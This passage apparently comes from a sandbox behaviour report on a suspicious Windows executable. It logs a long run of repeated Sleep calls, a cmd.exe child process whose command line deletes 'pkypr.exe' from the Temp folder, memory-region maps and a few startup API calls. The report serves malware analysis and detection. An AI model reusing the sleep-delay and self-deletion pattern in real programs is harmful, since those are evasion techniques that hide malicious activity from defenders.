Sleep (dwMilliseconds=0x7d0) [0210.441] Sleep (dwMilliseconds=0x7d0) [0210.545] Sleep (dwMilliseconds=0x7d0) [0210.706] Sleep (dwMilliseconds=0x7d0) [0210.817] Sleep (dwMilliseconds=0x7d0) [0211.127] Sleep (dwMilliseconds=0x7d0) [0211.385] Sleep (dwMilliseconds=0x7d0) [0211.481] Sleep (dwMilliseconds=0x7d0) [0211.553] Sleep (dwMilliseconds=0x7d0) [0211.639] Sleep (dwMilliseconds=0x7d0) [0211.723] Sleep (dwMilliseconds=0x7d0) [0211.816] Sleep (dwMilliseconds=0x7d0) [0211.967] Sleep (dwMilliseconds=0x7d0) [0212.026] Sleep (dwMilliseconds=0x7d0) [0212.113] Sleep (dwMilliseconds=0x7d0) [0212.249] Sleep (dwMilliseconds=0x7d0) [0212.428] Sleep (dwMilliseconds=0x7d0) [0212.457] Sleep (dwMilliseconds=0x7d0) [0212.536] Sleep (dwMilliseconds=0x7d0) [0212.644] Sleep (dwMilliseconds=0x7d0) [0212.700] Sleep (dwMilliseconds=0x7d0) [0212.753] Sleep (dwMilliseconds=0x7d0) [0212.826] Sleep (dwMilliseconds=0x7d0) [0212.943] Sleep (dwMilliseconds=0x7d0) [0213.030] Sleep (dwMilliseconds=0x7d0) [0213.271] Sleep (dwMilliseconds=0x7d0) [0213.313] Sleep (dwMilliseconds=0x7d0) [0213.349] Sleep (dwMilliseconds=0x7d0) [0213.404] Sleep (dwMilliseconds=0x7d0) [0213.456] Sleep (dwMilliseconds=0x7d0) [0213.481] Sleep (dwMilliseconds=0x7d0) [0213.509] Sleep (dwMilliseconds=0x7d0) [0213.560] Sleep (dwMilliseconds=0x7d0) [0213.659] Sleep (dwMilliseconds=0x7d0) [0213.719] Sleep (dwMilliseconds=0x7d0) [0213.728] Sleep (dwMilliseconds=0x7d0) [0213.794] Sleep (dwMilliseconds=0x7d0) [0213.853] Sleep (dwMilliseconds=0x7d0) [0213.933] Sleep (dwMilliseconds=0x7d0) [0213.993] Sleep (dwMilliseconds=0x7d0) [0214.003] Sleep (dwMilliseconds=0x7d0) [0214.060] Sleep (dwMilliseconds=0x7d0) [0214.118] Sleep (dwMilliseconds=0x7d0) [0214.179] Sleep (dwMilliseconds=0x7d0) [0214.217] Sleep (dwMilliseconds=0x7d0) [0214.304] Sleep (dwMilliseconds=0x7d0) [0214.353] Sleep (dwMilliseconds=0x7d0) [0214.454] Sleep (dwMilliseconds=0x7d0) [0214.552] Sleep (dwMilliseconds=0x7d0) [0214.599] Sleep (dwMilliseconds=0x7d0) [0214.671] Sleep (dwMilliseconds=0x7d0) [0214.729] Sleep (dwMilliseconds=0x7d0) [0214.783] Sleep (dwMilliseconds=0x7d0) [0214.794] Sleep (dwMilliseconds=0x7d0) [0214.844] Sleep (dwMilliseconds=0x7d0) [0214.912] Sleep (dwMilliseconds=0x7d0) [0214.976] Sleep (dwMilliseconds=0x7d0) [0215.054] Sleep (dwMilliseconds=0x7d0) [0215.144] Sleep (dwMilliseconds=0x7d0) [0215.265] Sleep (dwMilliseconds=0x7d0) [0215.336] Sleep (dwMilliseconds=0x7d0) [0215.381] Sleep (dwMilliseconds=0x7d0) [0215.392] Sleep (dwMilliseconds=0x7d0) [0215.447] Sleep (dwMilliseconds=0x7d0) [0215.501] Sleep (dwMilliseconds=0x7d0) [0215.546] Sleep (dwMilliseconds=0x7d0) [0215.558] Sleep (dwMilliseconds=0x7d0) [0215.637] Sleep (dwMilliseconds=0x7d0) [0215.702] Sleep (dwMilliseconds=0x7d0) [0215.851] Sleep (dwMilliseconds=0x7d0) [0215.912] Sleep (dwMilliseconds=0x7d0) [0215.961] Sleep (dwMilliseconds=0x7d0) [0216.003] Sleep (dwMilliseconds=0x7d0) [0216.055] Sleep (dwMilliseconds=0x7d0) [0216.172] Sleep (dwMilliseconds=0x7d0) [0216.234] Sleep (dwMilliseconds=0x7d0) [0216.319] Sleep (dwMilliseconds=0x7d0) [0216.456] Sleep (dwMilliseconds=0x7d0) [0216.693] Sleep (dwMilliseconds=0x7d0) [0217.172] Sleep (dwMilliseconds=0x7d0) [0217.461] Sleep (dwMilliseconds=0x7d0) [0217.699] Sleep (dwMilliseconds=0x7d0) [0217.958] Sleep (dwMilliseconds=0x7d0) [0218.057] Sleep (dwMilliseconds=0x7d0) [0218.091] Sleep (dwMilliseconds=0x7d0) [0218.156] Sleep (dwMilliseconds=0x7d0) [0218.223] Sleep (dwMilliseconds=0x7d0) [0218.285] Sleep (dwMilliseconds=0x7d0) [0218.386] Sleep (dwMilliseconds=0x7d0) [0218.396] Sleep (dwMilliseconds=0x7d0) [0218.444] Sleep (dwMilliseconds=0x7d0) [0218.503] Sleep (dwMilliseconds=0x7d0) [0218.638] Sleep (dwMilliseconds=0x7d0) [0218.663] Sleep (dwMilliseconds=0x7d0) [0218.705] Sleep (dwMilliseconds=0x7d0) [0218.769] Sleep (dwMilliseconds=0x7d0) [0218.817] Sleep (dwMilliseconds=0x7d0) [0218.910] Sleep (dwMilliseconds=0x7d0) [0218.932] Sleep (dwMilliseconds=0x7d0) [0219.049] Sleep (dwMilliseconds=0x7d0) [0219.108] Sleep (dwMilliseconds=0x7d0) [0219.152] Sleep (dwMilliseconds=0x7d0) [0219.163] Sleep (dwMilliseconds=0x7d0) [0219.238] Sleep (dwMilliseconds=0x7d0) [0219.598] Sleep (dwMilliseconds=0x7d0) [0219.674] Sleep (dwMilliseconds=0x7d0) [0219.720] Sleep (dwMilliseconds=0x7d0) [0219.760] Sleep (dwMilliseconds=0x7d0) [0219.822] Sleep (dwMilliseconds=0x7d0) [0219.894] Sleep (dwMilliseconds=0x7d0) [0219.954] Sleep (dwMilliseconds=0x7d0) [0219.995] Sleep (dwMilliseconds=0x7d0) [0220.060] Sleep (dwMilliseconds=0x7d0) [0220.116] Sleep (dwMilliseconds=0x7d0) [0220.251] Sleep (dwMilliseconds=0x7d0) [0220.325] Sleep (dwMilliseconds=0x7d0) [0220.380] Sleep (dwMilliseconds=0x7d0) [0220.391] Sleep (dwMilliseconds=0x7d0) [0220.437] Sleep (dwMilliseconds=0x7d0) [0220.499] Sleep (dwMilliseconds=0x7d0) [0220.577] Sleep (dwMilliseconds=0x7d0) [0220.660] Sleep (dwMilliseconds=0x7d0) [0220.709] Sleep (dwMilliseconds=0x7d0) [0220.914] Sleep (dwMilliseconds=0x7d0) [0221.088] Sleep (dwMilliseconds=0x7d0) [0221.162] Sleep (dwMilliseconds=0x7d0) [0221.310] Sleep (dwMilliseconds=0x7d0) [0221.373] Sleep (dwMilliseconds=0x7d0) [0221.512] Sleep (dwMilliseconds=0x7d0) [0221.582] Sleep (dwMilliseconds=0x7d0) [0221.826] Sleep (dwMilliseconds=0x7d0) [0222.152] Sleep (dwMilliseconds=0x7d0) [0222.248] Sleep (dwMilliseconds=0x7d0) [0222.357] Sleep (dwMilliseconds=0x7d0) [0222.490] Sleep (dwMilliseconds=0x7d0) [0222.606] Sleep (dwMilliseconds=0x7d0) [0222.699] Sleep (dwMilliseconds=0x7d0) [0222.783] Sleep (dwMilliseconds=0x7d0) [0222.795] Sleep (dwMilliseconds=0x7d0) [0222.862] Sleep (dwMilliseconds=0x7d0) [0222.944] Sleep (dwMilliseconds=0x7d0) [0222.995] Sleep (dwMilliseconds=0x7d0) [0223.108] Sleep (dwMilliseconds=0x7d0) [0223.135] Sleep (dwMilliseconds=0x7d0) [0223.197] Sleep (dwMilliseconds=0x7d0) [0223.248] Sleep (dwMilliseconds=0x7d0) [0223.361] Sleep (dwMilliseconds=0x7d0) [0223.366] Sleep (dwMilliseconds=0x7d0) [0223.422] Sleep (dwMilliseconds=0x7d0) [0223.484] Sleep (dwMilliseconds=0x7d0) [0223.541] Sleep (dwMilliseconds=0x7d0) [0223.556] Sleep (dwMilliseconds=0x7d0) [0223.594] Sleep (dwMilliseconds=0x7d0) [0223.644] Sleep (dwMilliseconds=0x7d0) [0223.688] Sleep (dwMilliseconds=0x7d0) [0223.714] Sleep (dwMilliseconds=0x7d0) [0223.912] Sleep (dwMilliseconds=0x7d0) [0224.003] Sleep (dwMilliseconds=0x7d0) [0224.129] Sleep (dwMilliseconds=0x7d0) [0224.213] Sleep (dwMilliseconds=0x7d0) [0224.224] Sleep (dwMilliseconds=0x7d0) [0224.282] Sleep (dwMilliseconds=0x7d0) [0224.368] Sleep (dwMilliseconds=0x7d0) [0224.426] Sleep (dwMilliseconds=0x7d0) [0224.468] Sleep (dwMilliseconds=0x7d0) [0224.513] Sleep (dwMilliseconds=0x7d0) [0224.580] Sleep (dwMilliseconds=0x7d0) [0224.626] Sleep (dwMilliseconds=0x7d0) [0224.676] Sleep (dwMilliseconds=0x7d0) [0224.689] Sleep (dwMilliseconds=0x7d0) [0224.728] Sleep (dwMilliseconds=0x7d0) [0224.798] Sleep (dwMilliseconds=0x7d0) [0224.874] Sleep (dwMilliseconds=0x7d0) [0224.971] Sleep (dwMilliseconds=0x7d0) [0225.064] Sleep (dwMilliseconds=0x7d0) [0225.256] Sleep (dwMilliseconds=0x7d0) [0225.506] Sleep (dwMilliseconds=0x7d0) [0225.574] Sleep (dwMilliseconds=0x7d0) [0225.604] Sleep (dwMilliseconds=0x7d0) [0225.649] Sleep (dwMilliseconds=0x7d0) [0225.707] Sleep (dwMilliseconds=0x7d0) [0225.764] Sleep (dwMilliseconds=0x7d0) [0225.812] Sleep (dwMilliseconds=0x7d0) [0225.840] Sleep (dwMilliseconds=0x7d0) [0225.912] Sleep (dwMilliseconds=0x7d0) [0225.980] Sleep (dwMilliseconds=0x7d0) [0226.101] Sleep (dwMilliseconds=0x7d0) [0226.204] Sleep (dwMilliseconds=0x7d0) [0226.219] Sleep (dwMilliseconds=0x7d0) [0226.329] Sleep (dwMilliseconds=0x7d0) [0226.382] Sleep (dwMilliseconds=0x7d0) [0226.434] Sleep (dwMilliseconds=0x7d0) [0226.512] Sleep (dwMilliseconds=0x7d0) [0226.566] Sleep (dwMilliseconds=0x7d0) [0226.666] Sleep (dwMilliseconds=0x7d0) [0226.757] Sleep (dwMilliseconds=0x7d0) [0226.853] Sleep (dwMilliseconds=0x7d0) [0226.902] Sleep (dwMilliseconds=0x7d0) [0226.926] Sleep (dwMilliseconds=0x7d0) [0226.983] Sleep (dwMilliseconds=0x7d0) [0227.090] Sleep (dwMilliseconds=0x7d0) [0227.175] Sleep (dwMilliseconds=0x7d0) [0227.221] Sleep (dwMilliseconds=0x7d0) [0227.236] Sleep (dwMilliseconds=0x7d0) [0227.285] Sleep (dwMilliseconds=0x7d0) [0227.348] Sleep (dwMilliseconds=0x7d0) [0227.402] Sleep (dwMilliseconds=0x7d0) [0227.413] Sleep (dwMilliseconds=0x7d0) [0227.457] Sleep (dwMilliseconds=0x7d0) [0227.508] Sleep (dwMilliseconds=0x7d0) [0227.561] Sleep (dwMilliseconds=0x7d0) [0227.604] Sleep (dwMilliseconds=0x7d0) [0227.649] Sleep (dwMilliseconds=0x7d0) [0227.746] Sleep (dwMilliseconds=0x7d0) [0227.831] Sleep (dwMilliseconds=0x7d0) [0227.919] Sleep (dwMilliseconds=0x7d0) [0228.093] Sleep (dwMilliseconds=0x7d0) [0228.152] Sleep (dwMilliseconds=0x7d0) [0228.246] Sleep (dwMilliseconds=0x7d0) [0228.370] Sleep (dwMilliseconds=0x7d0) [0228.454] Sleep (dwMilliseconds=0x7d0) [0228.469] Sleep (dwMilliseconds=0x7d0) [0228.598] Sleep (dwMilliseconds=0x7d0) [0228.686] Sleep (dwMilliseconds=0x7d0) [0228.760] Sleep (dwMilliseconds=0x7d0) [0228.839] Sleep (dwMilliseconds=0x7d0) [0228.860] Sleep (dwMilliseconds=0x7d0) [0229.231] Sleep (dwMilliseconds=0x7d0) [0235.276] Sleep (dwMilliseconds=0x7d0) [0235.389] Sleep (dwMilliseconds=0x7d0) [0235.458] Sleep (dwMilliseconds=0x7d0) [0235.862] Sleep (dwMilliseconds=0x7d0) [0235.921] Sleep (dwMilliseconds=0x7d0) [0235.982] Sleep (dwMilliseconds=0x7d0) [0236.057] Sleep (dwMilliseconds=0x7d0) [0236.116] Sleep (dwMilliseconds=0x7d0) [0236.174] Sleep (dwMilliseconds=0x7d0) [0236.254] Sleep (dwMilliseconds=0x7d0) [0236.323] Sleep (dwMilliseconds=0x7d0) [0236.386] Sleep (dwMilliseconds=0x7d0) [0236.445] Sleep (dwMilliseconds=0x7d0) [0236.511] Sleep (dwMilliseconds=0x7d0) [0236.643] Sleep (dwMilliseconds=0x7d0) [0236.696] Sleep (dwMilliseconds=0x7d0) [0236.747] Sleep (dwMilliseconds=0x7d0) [0236.804] Sleep (dwMilliseconds=0x7d0) [0236.901] Sleep (dwMilliseconds=0x7d0) [0236.983] Sleep (dwMilliseconds=0x7d0) [0237.060] Sleep (dwMilliseconds=0x7d0) [0237.089] Sleep (dwMilliseconds=0x7d0) [0237.097] Sleep (dwMilliseconds=0x7d0) [0237.178] Sleep (dwMilliseconds=0x7d0) [0237.296] Sleep (dwMilliseconds=0x7d0) [0237.399] Sleep (dwMilliseconds=0x7d0) [0237.623] Sleep (dwMilliseconds=0x7d0) [0237.740] Sleep (dwMilliseconds=0x7d0) [0237.851] Sleep (dwMilliseconds=0x7d0) [0237.986] Sleep (dwMilliseconds=0x7d0) [0238.062] Sleep (dwMilliseconds=0x7d0) [0238.090] Sleep (dwMilliseconds=0x7d0) [0238.105] Sleep (dwMilliseconds=0x7d0) [0238.127] Sleep (dwMilliseconds=0x7d0) [0238.206] Sleep (dwMilliseconds=0x7d0) [0238.598] Sleep (dwMilliseconds=0x7d0) [0238.829] Sleep (dwMilliseconds=0x7d0) [0238.950] Sleep (dwMilliseconds=0x7d0) [0239.062] Sleep (dwMilliseconds=0x7d0) [0239.947] Sleep (dwMilliseconds=0x7d0) [0240.046] Sleep (dwMilliseconds=0x7d0) [0240.152] Sleep (dwMilliseconds=0x7d0) [0240.376] Sleep (dwMilliseconds=0x7d0) [0240.853] Sleep (dwMilliseconds=0x7d0) [0240.961] Sleep (dwMilliseconds=0x7d0) [0241.207] Sleep (dwMilliseconds=0x7d0) [0241.408] Sleep (dwMilliseconds=0x7d0) [0241.543] Sleep (dwMilliseconds=0x7d0) [0241.663] Sleep (dwMilliseconds=0x7d0) [0241.718] Sleep (dwMilliseconds=0x7d0) [0242.075] Sleep (dwMilliseconds=0x7d0) [0242.112] Sleep (dwMilliseconds=0x7d0) [0242.123] Sleep (dwMilliseconds=0x7d0) [0242.158] Sleep (dwMilliseconds=0x7d0) [0242.222] Sleep (dwMilliseconds=0x7d0) [0242.335] Sleep (dwMilliseconds=0x7d0) [0242.410] Sleep (dwMilliseconds=0x7d0) [0242.523] Sleep (dwMilliseconds=0x7d0) [0242.830] Sleep (dwMilliseconds=0x7d0) [0242.985] Sleep (dwMilliseconds=0x7d0) [0243.150] Sleep (dwMilliseconds=0x7d0) [0243.255] Sleep (dwMilliseconds=0x7d0) [0243.383] Sleep (dwMilliseconds=0x7d0) [0245.306] Sleep (dwMilliseconds=0x7d0) [0245.427] Sleep (dwMilliseconds=0x7d0) [0245.679] Sleep (dwMilliseconds=0x7d0) [0245.961] Sleep (dwMilliseconds=0x7d0) [0246.053] Sleep (dwMilliseconds=0x7d0) [0246.570] Sleep (dwMilliseconds=0x7d0) [0246.719] Sleep (dwMilliseconds=0x7d0) [0246.805] Sleep (dwMilliseconds=0x7d0) [0246.870] Sleep (dwMilliseconds=0x7d0) [0246.976] Sleep (dwMilliseconds=0x7d0) [0247.109] Sleep (dwMilliseconds=0x7d0) [0247.164] Sleep (dwMilliseconds=0x7d0) [0247.222] Sleep (dwMilliseconds=0x7d0) [0247.294] Sleep (dwMilliseconds=0x7d0) [0247.370] Sleep (dwMilliseconds=0x7d0) [0247.533] Sleep (dwMilliseconds=0x7d0) [0247.585] Sleep (dwMilliseconds=0x7d0) [0247.681] Sleep (dwMilliseconds=0x7d0) [0247.736] Sleep (dwMilliseconds=0x7d0) [0247.800] Sleep (dwMilliseconds=0x7d0) [0247.854] Sleep (dwMilliseconds=0x7d0) [0247.923] Sleep (dwMilliseconds=0x7d0) [0247.977] Sleep (dwMilliseconds=0x7d0) [0248.038] Sleep (dwMilliseconds=0x7d0) [0248.067] Sleep (dwMilliseconds=0x7d0) [0248.107] Sleep (dwMilliseconds=0x7d0) [0248.169] Sleep (dwMilliseconds=0x7d0) [0248.223] Sleep (dwMilliseconds=0x7d0) [0248.321] Sleep (dwMilliseconds=0x7d0) [0248.621] Sleep (dwMilliseconds=0x7d0) [0248.886] Sleep (dwMilliseconds=0x7d0) [0248.975] Sleep (dwMilliseconds=0x7d0) [0249.136] Sleep (dwMilliseconds=0x7d0) [0249.322] Sleep (dwMilliseconds=0x7d0) [0249.597] Sleep (dwMilliseconds=0x7d0) [0250.101] Sleep (dwMilliseconds=0x7d0) [0250.349] Sleep (dwMilliseconds=0x7d0) [0250.843] Sleep (dwMilliseconds=0x7d0) [0251.067] Sleep (dwMilliseconds=0x7d0) [0251.312] Sleep (dwMilliseconds=0x7d0) [0251.640] Sleep (dwMilliseconds=0x7d0) [0251.763] Sleep (dwMilliseconds=0x7d0) [0251.822] Sleep (dwMilliseconds=0x7d0) [0252.772] Sleep (dwMilliseconds=0x7d0) [0254.987] Sleep (dwMilliseconds=0x7d0) [0255.380] Sleep (dwMilliseconds=0x7d0) [0255.578] Sleep (dwMilliseconds=0x7d0) [0255.706] Sleep (dwMilliseconds=0x7d0) [0256.541] Sleep (dwMilliseconds=0x7d0) [0257.069] Sleep (dwMilliseconds=0x7d0) [0257.196] Sleep (dwMilliseconds=0x7d0) [0257.261] Sleep (dwMilliseconds=0x7d0) [0257.415] Sleep (dwMilliseconds=0x7d0) [0257.521] Sleep (dwMilliseconds=0x7d0) [0257.559] Sleep (dwMilliseconds=0x7d0) [0257.861] Sleep (dwMilliseconds=0x7d0) [0257.937] Sleep (dwMilliseconds=0x7d0) [0258.060] Sleep (dwMilliseconds=0x7d0) [0258.078] Sleep (dwMilliseconds=0x7d0) [0258.113] Sleep (dwMilliseconds=0x7d0) [0258.166] Sleep (dwMilliseconds=0x7d0) [0258.210] Sleep (dwMilliseconds=0x7d0) [0258.249] Sleep (dwMilliseconds=0x7d0) [0258.319] Sleep (dwMilliseconds=0x7d0) [0258.490] Sleep (dwMilliseconds=0x7d0) [0258.529] Sleep (dwMilliseconds=0x7d0) [0258.580] Sleep (dwMilliseconds=0x7d0) [0258.734] Sleep (dwMilliseconds=0x7d0) [0258.795] Sleep (dwMilliseconds=0x7d0) [0258.942] Sleep (dwMilliseconds=0x7d0) [0258.990] Sleep (dwMilliseconds=0x7d0) [0259.062] Sleep (dwMilliseconds=0x7d0) [0259.075] Sleep (dwMilliseconds=0x7d0) [0259.120] Sleep (dwMilliseconds=0x7d0) [0259.174] Sleep (dwMilliseconds=0x7d0) [0259.219] Sleep (dwMilliseconds=0x7d0) [0259.321] Sleep (dwMilliseconds=0x7d0) [0259.337] Sleep (dwMilliseconds=0x7d0) [0259.400] Sleep (dwMilliseconds=0x7d0) [0259.449] Sleep (dwMilliseconds=0x7d0) [0259.557] Sleep (dwMilliseconds=0x7d0) [0259.573] Sleep (dwMilliseconds=0x7d0) [0259.608] Sleep (dwMilliseconds=0x7d0) [0259.658] Sleep (dwMilliseconds=0x7d0) [0259.706] Sleep (dwMilliseconds=0x7d0) [0259.761] Sleep (dwMilliseconds=0x7d0) [0259.773] Sleep (dwMilliseconds=0x7d0) [0259.925] Sleep (dwMilliseconds=0x7d0) [0260.049] Sleep (dwMilliseconds=0x7d0) [0260.139] Sleep (dwMilliseconds=0x7d0) [0260.184] Sleep (dwMilliseconds=0x7d0) [0260.204] Sleep (dwMilliseconds=0x7d0) [0260.258] Sleep (dwMilliseconds=0x7d0) [0260.358] Sleep (dwMilliseconds=0x7d0) [0260.407] Sleep (dwMilliseconds=0x7d0) [0260.431] Sleep (dwMilliseconds=0x7d0) [0260.582] Sleep (dwMilliseconds=0x7d0) [0260.724] Sleep (dwMilliseconds=0x7d0) [0260.833] Sleep (dwMilliseconds=0x7d0) [0260.868] Sleep (dwMilliseconds=0x7d0) [0260.894] Sleep (dwMilliseconds=0x7d0) [0260.938] Sleep (dwMilliseconds=0x7d0) [0260.995] Sleep (dwMilliseconds=0x7d0) [0261.048] Sleep (dwMilliseconds=0x7d0) [0261.083] Sleep (dwMilliseconds=0x7d0) [0261.119] Sleep (dwMilliseconds=0x7d0) [0261.230] Sleep (dwMilliseconds=0x7d0) [0261.429] Sleep (dwMilliseconds=0x7d0) [0261.538] Sleep (dwMilliseconds=0x7d0) [0261.579] Sleep (dwMilliseconds=0x7d0) [0261.635] Sleep (dwMilliseconds=0x7d0) [0261.722] Sleep (dwMilliseconds=0x7d0) [0261.770] Sleep (dwMilliseconds=0x7d0) [0261.791] Sleep (dwMilliseconds=0x7d0) [0262.030] Sleep (dwMilliseconds=0x7d0) [0262.130] Sleep (dwMilliseconds=0x7d0) [0262.253] Sleep (dwMilliseconds=0x7d0) [0262.340] Sleep (dwMilliseconds=0x7d0) [0262.396] Sleep (dwMilliseconds=0x7d0) [0262.539] Sleep (dwMilliseconds=0x7d0) [0262.703] Sleep (dwMilliseconds=0x7d0) [0262.908] Sleep (dwMilliseconds=0x7d0) [0263.288] Sleep (dwMilliseconds=0x7d0) [0263.384] Sleep (dwMilliseconds=0x7d0) [0263.714] Sleep (dwMilliseconds=0x7d0) Thread: id = 87 os_tid = 0xbd4 Thread: id = 88 os_tid = 0xbf4 Thread: id = 164 os_tid = 0xb80 Thread: id = 165 os_tid = 0x1318 Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4adc0000" os_pid = "0x630" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x374" cmd_line = "/c del \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1042 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1043 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1044 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1045 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1046 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 1047 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1048 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1049 start_va = 0x160000 end_va = 0x1b1fff monitored = 1 entry_point = 0x174fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1050 start_va = 0x1c0000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1051 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1052 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1053 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1054 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1055 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1056 start_va = 0x7fff0000 end_va = 0x7dfdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1057 start_va = 0x7dfdab590000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfdab590000" filename = "" Region: id = 1058 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1059 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1060 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1061 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1062 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1063 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1064 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1065 start_va = 0x4500000 end_va = 0x463ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1066 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1067 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1068 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1069 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1135 start_va = 0x4640000 end_va = 0x46fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1136 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1137 start_va = 0xd0000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1138 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1139 start_va = 0x4800000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1141 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1142 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 64 os_tid = 0x6d8 [0136.020] GetModuleHandleA (lpModuleName=0x0) returned 0x160000 [0136.020] __set_app_type (_Type=0x1) [0136.021] __p__fmode () returned 0x74e64d6c [0136.021] __p__commode () returned 0x74e65b1c [0136.021] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x175200) returned 0x0 [0136.021] __getmainargs (in: _Argc=0x1860e8, _Argv=0x1860ec, _Env=0x1860f0, _DoWildCard=0, _StartInfo=0x1860fc | out: _Argc=0x1860e8, _Argv=0x1860ec, _Env=0x1860f0) returned 0 [0136.105] GetCurrentThreadId () returned 0x6d8 [0136.105] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6d8) returned 0x84 